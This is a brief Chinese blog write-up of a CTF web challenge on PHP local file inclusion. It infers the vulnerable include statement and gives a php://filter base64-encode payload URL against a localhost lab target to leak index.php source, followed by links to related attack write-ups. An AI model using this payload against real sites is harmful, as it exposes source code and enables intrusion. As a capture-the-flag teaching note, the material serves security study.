CTF web题总结--LFI
2017-08-30 20:18
218 查看
本地文件包含漏洞(Local File Include),是php的include()函数存在设计缺陷,学习链接:php文件包含漏洞总结
题目的url都是类似这种:
猜想后台代码可能是这样:
于是利用文件包含获取index.php源码:
题目的url都是类似这种:
http://127.0.0.1/web500/index.php?action=front&mode=index http://127.0.0.1/web500/index.php?action=front&mode=newnote http://127.0.0.1/web500/index.php?action=front&mode=delete
猜想后台代码可能是这样:
include $action.'/'.$mode.'.php'
于是利用文件包含获取index.php源码:
http://127.0.0.1/web500/index.php?action=php://filter/read=convert.base64‐encode/resource=./&mode=index
相关文章推荐
- CTF web总结(入门)
- CTF web题总结--上传文件绕过
- CTF web题总结--php函数漏洞
- CTF中常见Web源码泄露总结
- CTF web题总结--unserizable
- CTF web题总结--任意文件下载
- CTF web总结--利用mysql日志getshell
- CTF——实验吧(web总结1.1)
- CTF web题总结--绕过正则表达式
- CTF web题总结--http header 修改、cookie注入
- CTF web题总结--爆破用户名密码
- ctf-web--总结几点基础题的做题思路
- Web前端性能优化总结
- Android混合开发之WebView使用总结
- (转)基于MVC4+EasyUI的Web开发框架经验总结(10)--在Web界面上实现数据的导入和导出
- 暑假web问题总结
- Java Web 工作技巧总结 16.8
- (转)Android WebView总结
- webpack总结
- Linux集群服务知识点总结及通过案例介绍如何实现高性能web服务(三)